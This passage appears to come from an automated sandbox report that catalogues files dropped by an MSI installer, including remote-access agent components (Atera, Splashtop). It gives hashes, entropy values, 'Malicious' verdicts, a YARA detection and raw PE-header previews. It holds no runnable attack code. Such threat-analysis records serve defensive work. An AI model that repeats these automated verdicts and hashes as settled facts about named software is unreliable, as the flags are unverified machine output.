                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                                                                  MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                                                                  SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                                                                  SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIE0C6.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):216496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                                                                  MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                                                                  SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                                                                  SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF4AD.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):521954
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                                                                  MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                                                                  SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                                                                  SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                                                                  MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                                                                  SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                                                                  SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF4AD.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1538
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                                                                  MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                                                                  SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                                                                  SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF4AD.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):184240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                                                                  MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                                                                  SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                                                                  SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF4AD.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):711952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                                                                  MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                                                                  SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF4AD.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):61448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                                                                  MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                                                                  SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                                                                  SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                                                                  SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF78C.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):14156726
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.5773426483773
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:393216:EBRFUi+IgwaO79BRFUi+IgwaO76BRFUi+IgwaO7t:U5g/O7x5g/O7e5g/O7t
                                                                                                                                                                                                                                                                                                                                  MD5:7DFA0F38A5F779C5A231872A90382A4A
                                                                                                                                                                                                                                                                                                                                  SHA1:D9F9C026683321B99AA5B8F68E3108BE066BB61D
                                                                                                                                                                                                                                                                                                                                  SHA-256:F821E03150A8DDAACFBD6CC661BF9445D3C13FC6D4E02B6158712F15DDC6BB8B
                                                                                                                                                                                                                                                                                                                                  SHA-512:49F4DAF3EAC803C96850E89CD8C802EC9A361AC41BFFD4D540C8353889199ECB2C141B4B3D3292F94BB98A282F9C7314398E55E9A1F37B1033391542FF42D7D2
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}..Splashtop Streamer..setup.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{1FFB34B4-02B4-4EEE-ACA4-24941A8EDEE5}.....@.....@.....@.....@.......@.....@.....@.......@......Splashtop Streamer......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........Util_UpdateSetting....J...Util_UpdateSetting.@......1.H.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h.[...[...[....;..R....:..C....;..Z....:.......:..........\.......Z......^.......L...[........;..#....;..Z....;..Z...[...Z....;..Z...Rich[...........PE..L....;.d...........!.....l...........[....................................................@.............................g;...a.......p.......................P...7......8............................ ..@...............H...H\.......................text...2f...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIFB85.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4718641
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.577367326443097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:k3H5BNwueVRfshljU+cCD+EA2IvtynSyeGPCXtoa3yRHbXLjtQ:k3H5BNMshFUi+sng/oaO7y
                                                                                                                                                                                                                                                                                                                                  MD5:25A0AA722268B17888B4E159A9F82F18
                                                                                                                                                                                                                                                                                                                                  SHA1:68CCB5ADAE9095056A9D5592F6A850F30715A86B
                                                                                                                                                                                                                                                                                                                                  SHA-256:72896D8ABEEEB40360596927C0FEADE8F0BC28F9937D35F646B9BA2A47F1EDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:79A574F95DBB5FF11E35F2938FCD6A9E22A3F1A35D7E032ACEB099DD69AD45DCDF006D92AEB7D1086E3D0615241F6669E510D5DEE6F7D262E0E3D4179822365D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h.[...[...[....;..R....:..C....;..Z....:.......:..........\.......Z......^.......L...[........;..#....;..Z....;..Z...[...Z....;..Z...Rich[...........PE..L....;.d...........!.....l...........[....................................................@.............................g;...a.......p.......................P...7......8............................ ..@...............H...H\.......................text...2f.......h.................. ..`.orpc... ............l.............. ..`.rdata..w3.......4...p..............@..@.data...............................@....rsrc........p......................@..@.reloc..f(...P...*...r..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\SourceHash{B7C5EA94-B96A-41F5-BE95-25D78B486678}

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1624765036517282
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72FjOoAGiLIlHVRpMh/7777777777777777777777777vDHFS6Q80tlp3XlN:J5QI5czQ80tb6F
                                                                                                                                                                                                                                                                                                                                  MD5:967BF8244F5010F04F9BF42A0D4759C3
                                                                                                                                                                                                                                                                                                                                  SHA1:3456A9FCD05BCD51BB02055E6E5E405794CD6390
                                                                                                                                                                                                                                                                                                                                  SHA-256:601380D102A0A5327A85E96CCD3C8C18C66EDCCF71FE17ACB20DDE5A01392698
                                                                                                                                                                                                                                                                                                                                  SHA-512:ACD871A6153A5C94F58BF859C80860D8552B05DEB17A24A27C55648E2D730EE2A5D0F4721BA156ABA88EB684154F95E04E02BFE3DF9EABDD09EBDF1052E2366A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\SourceHash{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1728228471254394
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72FjkAGiLIlHVRpph/7777777777777777777777777vDHFw6CbWl0i8Q:J2QI5d5CXF
                                                                                                                                                                                                                                                                                                                                  MD5:3DD4C0AC6B7B662E1D68EC5C798E70F7
                                                                                                                                                                                                                                                                                                                                  SHA1:9757BCA0AB3233EAFC6283A10EBEEE0111732414
                                                                                                                                                                                                                                                                                                                                  SHA-256:726D119785B6FE3D76B85C6DB8E0B336000ED8AF18046D67BD7E97FD092DAB45
                                                                                                                                                                                                                                                                                                                                  SHA-512:4CDDFAC2FC713C61248B162650F6A33682F11FA4C77B34E39E51B935AFF15A959D2AA83845CFAFCDFF323C7D154E990F15C8EF317E95EF0FC4EBBD079E001982
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\SourceHash{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1748570491835126
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72FjkaAGiLIlHVRpUh/7777777777777777777777777vDHFxgIjNxKR/XlN:JeaQI5E5NxKJ6F
                                                                                                                                                                                                                                                                                                                                  MD5:C7D19DF5254610183477CD96E85EDCA7
                                                                                                                                                                                                                                                                                                                                  SHA1:EA4C6B540C3A85910F824F1EDA6EFCCB087E3E68
                                                                                                                                                                                                                                                                                                                                  SHA-256:5F3203BED5A206F89047CF96EADCD29E491796E3A93F457F698262759EDE9D76
                                                                                                                                                                                                                                                                                                                                  SHA-512:B7087AEB4279837172248EEB8B3321BAC09956EFEC745DF4A869F854B0AD439533D4A22DCD54E2D6B0717450D00A3DBE92AD7D852BE372204C1E0F4FB15F7722
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1677069665486992
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72FjrlAGiLIlHVRp+h/7777777777777777777777777vDHFcJJFg/p1l0i5:JTQI5WiJ+2F
                                                                                                                                                                                                                                                                                                                                  MD5:A1519D63C2FE7D2BFA6E51E6FB4FFB46
                                                                                                                                                                                                                                                                                                                                  SHA1:99BC435B9895D8D3B2E90ADE08B4E36603DF7FA1
                                                                                                                                                                                                                                                                                                                                  SHA-256:6FDD5E9B942F00102B36DBE29345CCAE54C25DF1CC5EEB7AEBDB3A5D78EAD976
                                                                                                                                                                                                                                                                                                                                  SHA-512:88BE11E7CC01DA570A66A967E90BD9F6BB3004E031FA1078A276D7316E4D6D99DEBE3A58F3E64E94EE3088F4030BFE507213F82D2A2D1D1536A503EF1C00C47D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\SourceHash{E91F8AC1-4917-455E-AACA-B40B193C7A62}

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1744810030025719
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72Fj5YAGiLIlHVRpUh/7777777777777777777777777vDHFjfIaqR/Xl0i5:J8QI5ElIaqJ6F
                                                                                                                                                                                                                                                                                                                                  MD5:62E6D488EE2C1BF5898977155A8D3EC6
                                                                                                                                                                                                                                                                                                                                  SHA1:229971E613FDA91AF8AF470FC99C8D944FE9A4FB
                                                                                                                                                                                                                                                                                                                                  SHA-256:4FB46AA99829A96A3BDF7C97D15AC3F4E1F86A9BC30E37AAFB45537E0ED2518D
                                                                                                                                                                                                                                                                                                                                  SHA-512:9BF7BFA885EFFECAB872A6B2FE9E461242309CCEEBA2B45BEAD70DB0FEB21372C28103BE18A47BED9EB1BAB1E753A4C42FE91C6DAD09DE7DD7FDE4AE4BA3E4B2
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.6046824865930789
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:QYz8Ph4uRc06WXzAFT5FRddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:Lah411FTvdWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:B92FF4A308F3B808673B7406600F4685
                                                                                                                                                                                                                                                                                                                                  SHA1:D67BCB2BE319C693B6EE2556516F093B93C0E2E3
                                                                                                                                                                                                                                                                                                                                  SHA-256:25D3A6AEC26C39755D64BB97348F23917D9AED9FCCF952344969E231E9510AC0
